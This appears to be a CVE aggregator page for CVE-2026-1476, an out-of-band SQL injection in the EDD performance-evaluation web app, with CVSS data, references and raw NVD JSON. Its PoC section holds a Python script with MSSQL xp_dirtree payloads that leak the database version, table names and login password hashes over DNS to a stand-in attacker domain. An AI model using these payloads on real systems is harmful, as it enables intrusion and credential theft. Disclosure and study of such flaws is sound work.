CVE-2026-1476

Description

An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in ‘/evaluacion_acciones_ver_auto.aspx’, could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:* - VULNERABLE

Performance Evaluation (EDD) - 所有未修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import time

# CVE-2026-1476 OOB SQL Injection PoC
# Target: Performance Evaluation (EDD) application
# Vulnerable Parameter: Id_usuario
# Vulnerability: Out-of-band SQL injection in /evaluacion_acciones_ver_auto.aspx

target_url = "http://target.com/evaluacion_acciones_ver_auto.aspx"
attacker_domain = "attacker-controlled-domain.com"

def extract_data_via_dns(payload):
    """
    OOB SQLi - Extract data via DNS resolution
    The SQL query result will be appended to the attacker domain as subdomain
    """
    # DNS listener on attacker domain will capture the extracted data
    params = {
        'Id_usuario': payload
    }
    try:
        response = requests.get(target_url, params=params, timeout=5)
        return response.status_code
    except requests.exceptions.RequestException as e:
        print(f"Request error: {e}")
        return None

# Payload to extract database version
version_payload = "1'; DECLARE @cmd VARCHAR(500); SET @cmd = '\\\\'+(SELECT TOP 1 @@version)+'.{domain}'; EXEC master..xp_dirtree @cmd;--"
version_payload = version_payload.format(domain=attacker_domain)

# Payload to extract table names from information_schema
table_payload = "1'; DECLARE @cmd VARCHAR(500); SET @cmd = '\\\\'+(SELECT TOP 1 table_name FROM information_schema.tables)+'.{domain}'; EXEC master..xp_dirtree @cmd;--"
table_payload = table_payload.format(domain=attacker_domain)

# Payload to extract user credentials
credential_payload = "1'; DECLARE @cmd VARCHAR(500); SET @cmd = '\\\\'+(SELECT TOP 1 name+'::'+master.sys.fn_sqlvarbasetostr(HashBytes('MD5',password)) FROM master.sys.sql_logins)+'.{domain}'; EXEC master..xp_dirtree @cmd;--"
credential_payload = credential_payload.format(domain=attacker_domain)

print("CVE-2026-1476 OOB SQL Injection PoC")
print("="*50)
print(f"Target: {target_url}")
print(f"Attacker Domain: {attacker_domain}")
print("\nSending payloads...")

# Example: Extract database version
print("\nExtracting database version...")
extract_data_via_dns(version_payload)
time.sleep(2)

print("Payload sent. Check DNS logs on attacker domain for data exfiltration.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1476
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1476
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1476/
[4] VulDB https://vuldb.com/cve/CVE-2026-1476
[5] https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1476", "sourceIdentifier": "[email protected]", "published": "2026-01-27T17:16:10.980", "lastModified": "2026-02-10T20:20:00.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in ‘/evaluacion_acciones_ver_auto.aspx’, could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL fuera de banda (OOB SQLi) ha sido detectada en la aplicación de Evaluación del Desempeño (EDD) desarrollada por Gabinete Técnico de Programación. La explotación de esta vulnerabilidad en el parámetro 'Id_usuario' en '/evaluacion_acciones_ver_auto.aspx' podría permitir a un atacante extraer información sensible de la base de datos a través de canales externos, sin que la aplicación afectada devuelva los datos directamente, comprometiendo la confidencialidad de la información almacenada."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*", "matchCriteriaId": "66ECBB1A-4822-4186-9C8B-49740C8B52A4"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/out-band-sql-injection-quatuor-performance-evaluation", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}